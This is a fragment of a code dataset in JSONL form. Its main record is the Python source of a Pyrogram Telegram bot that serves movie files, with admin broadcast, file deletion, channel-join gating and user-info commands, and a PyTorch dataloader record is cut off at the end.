"imdb_api.views.movie_serializer_view.MovieView.as_view", "line_number": 63, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView", "line_number": 63, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView.as_view", "line_number": 65, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView.as_view", "line_number": 66, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "70772349287", "text": "import os\nimport time\nimport random\nimport logging\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup\nfrom info import START_MSG, CHANNELS, ADMINS, AUTH_CHANNEL, CUSTOM_FILE_CAPTION\nfrom utils import Media, get_file_details\nfrom pyrogram.errors import UserNotParticipant\nfrom db.mongo import insert, getid\nlogger = logging.getLogger(__name__)\n\nPHOTO = [\n \"https://telegra.ph/file/d053a8e9ef4ed93df38a0.jpg\",\n \"https://telegra.ph/file/d1c6ee6d32e142f3674ed.jpg\", \n \"https://telegra.ph/file/8fd7710ee17bd34a963a5.jpg\", \n \"https://telegra.ph/file/ecb7510e187f0e3b60852.jpg\", \n \"https://telegra.ph/file/ef7f1cbc33ac9ee47578d.jpg\", \n \"https://telegra.ph/file/a5ce5774734d8c119c630.jpg\"\n]\n\n@Client.on_message(filters.private & filters.user(ADMINS) & filters.command([\"broadcast\"]))\nasync def broadcast(bot, message):\n if (message.reply_to_message):\n ms = await message.reply_text(\"Geting All ids from database ...........\")\n ids = getid()\n tot = len(ids)\n await ms.edit(f\"Starting Broadcast .... \\n Sending Message To {tot} Users\")\n for id in ids:\n try:\n \tawait message.reply_to_message.copy(id)\n except:\n \tpass\n\n\n@Client.on_message(filters.command(\"start\"))\nasync def start(bot, cmd):\n usr_cmdall1 = cmd.text\n if usr_cmdall1.startswith(\"/start subinps\"):\n if AUTH_CHANNEL:\n invite_link = await bot.create_chat_invite_link(int(AUTH_CHANNEL))\n try:\n user = await bot.get_chat_member(int(AUTH_CHANNEL), cmd.from_user.id)\n if user.status == \"kicked\":\n await bot.send_message(\n chat_id=cmd.from_user.id,\n text=\"Sorry Sir, You are Banned to use me.\",\n parse_mode=\"markdown\",\n disable_web_page_preview=True\n )\n return\n except UserNotParticipant:\n ident, file_id = cmd.text.split(\"_-_-_-_\")\n await bot.send_photo(\n chat_id=cmd.from_user.id,\n photo=f\"{random.choice(PHOTO)}\",\n caption=\"** 🔊 𝗝𝗼𝗶𝗻 𝗢𝘂𝗿 𝗰𝗵𝗮𝗻𝗻𝗲𝗹 🤭\\n\\n🔊 ഞങ്ങളുടെ 𝙈𝙖𝙞𝙣 𝘾𝙝𝙖𝙣𝙣𝙚𝙡 ജോയിൻ ചെയ്താൽ മാത്രമേ സിനിമ ലഭിക്കുകയുള്ളൂ.... 😁\\n\\nJoin ചെയ്ത ശേഷം Try Again ബട്ടൺ ക്ലിക്ക് ചെയ്യൂ.😁 **\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"💢 JOIN OUR CHANNEL 💢\", url=invite_link.invite_link)\n ],\n [\n InlineKeyboardButton(\" 🔄 Try Again\", callback_data=f\"checksub#{file_id}\")\n ]\n ]\n ),\n parse_mode=\"markdown\"\n )\n return\n except Exception:\n await bot.send_message(\n chat_id=cmd.from_user.id,\n text=\"Something went Wrong.\",\n parse_mode=\"markdown\",\n disable_web_page_preview=True\n )\n return\n try:\n ident, file_id = cmd.text.split(\"_-_-_-_\")\n filedetails = await get_file_details(file_id)\n for files in filedetails:\n title = files.file_name\n size=files.file_size\n f_caption=files.caption\n if CUSTOM_FILE_CAPTION:\n try:\n f_caption=CUSTOM_FILE_CAPTION.format(file_name=title, file_size=size, file_caption=f_caption)\n except Exception as e:\n print(e)\n f_caption=f_caption\n if f_caption is None:\n f_caption = f\"{files.file_name}\"\n user_id = int(cmd.from_user.id)\n insert(user_id)\n buttons = [\n [\n InlineKeyboardButton('💢 Join Channel 💢', url='https://t.me/cinemacollections')\n ]]\n await bot.send_cached_media(\n chat_id=cmd.from_user.id,\n file_id=file_id,\n caption=f_caption,\n reply_markup=InlineKeyboardMarkup(buttons)\n )\n except Exception as err:\n await cmd.reply_text(f\"Something went wrong!\\n\\n**Error:** `{err}`\")\n elif len(cmd.command) > 1 and cmd.command[1] == 'subscribe':\n invite_link = await bot.create_chat_invite_link(int(AUTH_CHANNEL))\n await bot.send_photo(\n chat_id=cmd.from_user.id,\n photo=f\"{random.choice(PHOTO)}\",\n caption=\"**Please Join My Updates Channel to use this Bot!**\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"💢 Join Channel 💢\", url=invite_link.invite_link)\n ]\n ]\n )\n )\n else:\n await cmd.reply_photo(\n photo=f\"{random.choice(PHOTO)}\",\n caption=START_MSG,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('❔ How To Use Me ❔', url='https://t.me/movieReqGroup1')\n ],[ \n InlineKeyboardButton(\"Sᴇᴀʀᴄʜ Hᴇʀᴇ 🔎\", switch_inline_query_current_chat=''),\n InlineKeyboardButton(\"Group 🗯\", url='https://t.me/movieReqGroup1')\n ],\n [\n InlineKeyboardButton('Dev👩‍💻', url='https://t.me/DhashamoolamDhamu'),\n InlineKeyboardButton(\"About💡\", callback_data=\"about\")\n ],\n [ InlineKeyboardButton('➕ Add Me To Your Group ', url='https://t.me/Anjalina_bot?startgroup=true'),]\n ]\n )\n )\n\n\n@Client.on_message(filters.command('channel') & filters.user(ADMINS))\nasync def channel_info(bot, message):\n \"\"\"Send basic information of channel\"\"\"\n if isinstance(CHANNELS, (int, str)):\n channels = [CHANNELS]\n elif isinstance(CHANNELS, list):\n channels = CHANNELS\n else:\n raise ValueError(\"Unexpected type of CHANNELS\")\n\n text = '📑 **Indexed channels/groups**\\n'\n for channel in channels:\n chat = await bot.get_chat(channel)\n if chat.username:\n text += '\\n@' + chat.username\n else:\n text += '\\n' + chat.title or chat.first_name\n\n text += f'\\n\\n**Total:** {len(CHANNELS)}'\n\n if len(text) < 4096:\n await message.reply(text)\n else:\n file = 'Indexed channels.txt'\n with open(file, 'w') as f:\n f.write(text)\n await message.reply_document(file)\n os.remove(file)\n\n\n@Client.on_message(filters.command('total') & filters.user(ADMINS))\nasync def total(bot, message):\n \"\"\"Show total files in database\"\"\"\n msg = await message.reply(\"Processing...⏳\", quote=True)\n try:\n total = await Media.count_documents()\n await msg.edit(f'📁 Saved files: {total}')\n except Exception as e:\n logger.exception('Failed to check total files')\n await msg.edit(f'Error: {e}')\n\n\n@Client.on_message(filters.command('logger') & filters.user(ADMINS))\nasync def log_file(bot, message):\n \"\"\"Send log file\"\"\"\n try:\n await message.reply_document('TelegramBot.log')\n except Exception as e:\n await message.reply(str(e))\n\n\n@Client.on_message(filters.command('delete') & filters.user(ADMINS))\nasync def delete(bot, message):\n \"\"\"Delete file from database\"\"\"\n reply = message.reply_to_message\n if reply and reply.media:\n msg = await message.reply(\"Processing...⏳\", quote=True)\n else:\n await message.reply('Reply to file with /delete which you want to delete', quote=True)\n return\n\n for file_type in (\"document\", \"video\", \"audio\"):\n media = getattr(reply, file_type, None)\n if media is not None:\n break\n else:\n await msg.edit('This is not supported file format')\n return\n\n result = await Media.collection.delete_one({\n 'file_name': media.file_name,\n 'file_size': media.file_size,\n 'mime_type': media.mime_type\n })\n if result.deleted_count:\n await msg.edit('File is successfully deleted from database')\n else:\n await msg.edit('File not found in database')\n@Client.on_message(filters.command('about'))\nasync def bot_info(bot, message):\n buttons = [\n [\n InlineKeyboardButton('💢 Channel 💢', url='https://t.me/cinemacollections'),\n InlineKeyboardButton('🗯 Group 🗯', url='https://t.me/movieReqGroup1')\n ]\n ]\n await message.reply(text=\"Developer : Aɴᴊᴀʟɪɴᴀ\\nCode : Ɗнαѕнαмσσℓαм\\nLanguage : Python3\\nLibrary : Pyrogram asyncio\\nSource Code : Cʟɪᴄᴋ Mᴇ\\nCʜᴀɴɴᴇʟ : Channel \", reply_markup=InlineKeyboardMarkup(buttons), disable_web_page_preview=True)\n\n@Client.on_message(filters.command('help'))\nasync def bot_info(bot, message):\n buttons = [\n [\n InlineKeyboardButton('💢 Channel 💢', url='https://t.me/Cinemacollections'),\n InlineKeyboardButton('🗯 Group 🗯', url='https://t.me/movieReqGroup1')\n ]\n ]\n await message.reply(text=\"\"\"🙋🏻‍♂️ Hellooo {user_name} 🤓\n \n▶️ ꜱᴇɴᴅ ᴛʜᴇ ᴄᴏʀʀᴇᴄᴛ ɴᴀᴍᴇ ᴏꜰ мovιᴇ ꜱᴇʀɪᴇꜱ ( ᴜꜱᴇ ɢᴏᴏɢʟᴇ.ᴄᴏᴍ ᴛᴏ ɢᴇᴛ ᴄᴏʀʀᴇᴄᴛ ɴᴀᴍᴇ ! ) .\n\n▫️ Exᴀᴍᴘʟᴇ 1 : Lᴜᴄɪꜰᴇʀ\n▫️ Exᴀᴍᴘʟᴇ 2 : Lᴜᴄɪꜰᴇʀ мᴀʟᴀʏᴀʟᴀм\n▫️ Exᴀᴍᴘʟᴇ 1 : Lᴜᴄɪꜰᴇʀ 2021\n\n🔺 ɪꜰ ʏᴏᴜ ᴄᴀɴᴛ ꜰɪɴᴅ ᴛʜᴇ мovιᴇ ᴛʜᴀᴛ ʏᴏᴜ ʟᴏᴏᴋɪɴɢ ꜰᴏʀ. ᴛʜᴇɴ ʏᴏᴜ ᴄᴀɴ ꜱᴇɴᴅ ᴀ ᴍᴇꜱꜱᴀɢᴇ ᴛᴏ Dᴇᴠ\"\"\", reply_markup=InlineKeyboardMarkup(buttons), disable_web_page_preview=True)\n\n@Client.on_message(filters.command('info') & (filters.private | filters.group))\nasync def showinfo(client, message):\n try:\n cmd, id = message.text.split(\" \", 1)\n except:\n id = False\n pass\n\n if id:\n if (len(id) == 10 or len(id) == 9):\n try:\n checkid = int(id)\n except:\n await message.reply_text(\"__Enter a valid USER ID__\", quote=True, parse_mode=\"md\")\n return\n else:\n await message.reply_text(\"__Enter a valid USER ID__\", quote=True, parse_mode=\"md\")\n return \n\n if Config.SAVE_USER == \"yes\":\n name, username, dcid = await find_user(str(id))\n else:\n try:\n user = await client.get_users(int(id))\n name = str(user.first_name + (user.last_name or \"\"))\n username = user.username\n dcid = user.dc_id\n except:\n name = False\n pass\n\n if not name:\n await message.reply_text(\"__USER Details not found!!__\", quote=True, parse_mode=\"md\")\n return\n else:\n if message.reply_to_message:\n name = str(message.reply_to_message.from_user.first_name\\\n + (message.reply_to_message.from_user.last_name or \"\"))\n id = message.reply_to_message.from_user.id\n username = message.reply_to_message.from_user.username\n dcid = message.reply_to_message.from_user.dc_id\n else:\n name = str(message.from_user.first_name\\\n + (message.from_user.last_name or \"\"))\n id = message.from_user.id\n username = message.from_user.username\n dcid = message.from_user.dc_id\n \n if not str(username) == \"None\":\n user_name = f\"@{username}\"\n else:\n user_name = \"none\"\n\n await message.reply_text(\n f\"UserInfo\\n\\n\"\n f\"Name : {name}\\n\"\n f\"UserID : {id}\\n\"\n f\"Username Name : {user_name}\\n\"\n f\"Permanant USER Link : Link ❗️\\n\\n\"\n f\"@MovieReqGroup1\",\n quote=True,\n parse_mode=\"html\"\n )\n\n@Client.on_message(filters.command('id') & (filters.private | filters.group))\nasync def showid(client, message):\n chat_type = message.chat.type\n\n if chat_type == \"private\":\n user_id = message.chat.id\n await message.reply_text(\n f\"Your ID : `{user_id}`\",\n parse_mode=\"md\",\n quote=True\n )\n elif (chat_type == \"group\") or (chat_type == \"supergroup\"):\n user_id = message.from_user.id\n chat_id = message.chat.id\n if message.reply_to_message:\n reply_id = f\"Replied User ID : `{message.reply_to_message.from_user.id}`\"\n else:\n reply_id = \"\"\n await message.reply_text(\n f\"Your ID : `{user_id}`\\nThis Group ID : `{chat_id}`\\n\\n{reply_id}\",\n parse_mode=\"md\",\n quote=True\n ) \n\n", "repo_name": "ccadmin1/anjalina-Imdb", "sub_path": "plugins/commands.py", "file_name": "commands.py", "file_ext": "py", "file_size_in_byte": 13905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "db.mongo.getid", "line_number": 26, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 22, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pyrogram.filters", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 22, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 22, "usage_type": "argument"}, {"api_name": "pyrogram.filters.command", "line_number": 22, "usage_type": "call"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 40, "usage_type": "name"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 41, "usage_type": "argument"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 43, "usage_type": "argument"}, {"api_name": "pyrogram.errors.UserNotParticipant", "line_number": 52, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 56, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 58, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 61, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 64, "usage_type": "call"}, {"api_name": "utils.get_file_details", "line_number": 81, "usage_type": "call"}, {"api_name": "info.CUSTOM_FILE_CAPTION", "line_number": 86, "usage_type": "name"}, {"api_name": "info.CUSTOM_FILE_CAPTION.format", "line_number": 88, "usage_type": "call"}, {"api_name": "info.CUSTOM_FILE_CAPTION", "line_number": 88, "usage_type": "name"}, {"api_name": "db.mongo.insert", "line_number": 95, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 98, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 104, "usage_type": "call"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 109, "usage_type": "argument"}, {"api_name": "random.choice", "line_number": 112, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 114, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 117, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 124, "usage_type": "call"}, {"api_name": "info.START_MSG", "line_number": 125, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 126, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 129, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 131, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 132, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 135, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 136, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 138, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 36, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 36, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 147, "usage_type": "argument"}, {"api_name": "info.CHANNELS", "line_number": 148, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 149, "usage_type": "argument"}, {"api_name": "info.CHANNELS", "line_number": 150, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 162, "usage_type": "argument"}, {"api_name": "os.remove", "line_number": 171, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 144, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 144, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 144, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 144, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 144, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 144, "usage_type": "argument"}, {"api_name": "utils.Media.count_documents", "line_number": 179, "usage_type": "call"}, {"api_name": "utils.Media", "line_number": 179, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 174, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 174, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 174, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 174, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 174, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 174, "usage_type": "argument"}, {"api_name": "pyrogram.Client.on_message", "line_number": 186, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 186, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 186, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 186, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 186, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 186, "usage_type": "argument"}, {"api_name": "utils.Media.collection.delete_one", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.Media.collection", "line_number": 213, "usage_type": "attribute"}, {"api_name": "utils.Media", "line_number": 213, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 195, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 195, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 195, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 195, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 195, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 195, "usage_type": "argument"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 226, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 227, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 230, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 222, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 222, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 222, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 222, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 236, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 237, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 248, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 232, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 232, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 232, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 232, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 250, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 250, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 250, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 250, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pyrogram.filters.group", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pyrogram.Client.on_message", "line_number": 314, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 314, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 314, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 314, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pyrogram.filters.group", "line_number": 314, "usage_type": "attribute"}]} +{"seq_id": "2437004195", "text": "from torch.utils.data import DataLoader\n\n\ndef create_dataloader(opt):\n \"\"\"\n 从opt参数中创建dataloader\n :param opt (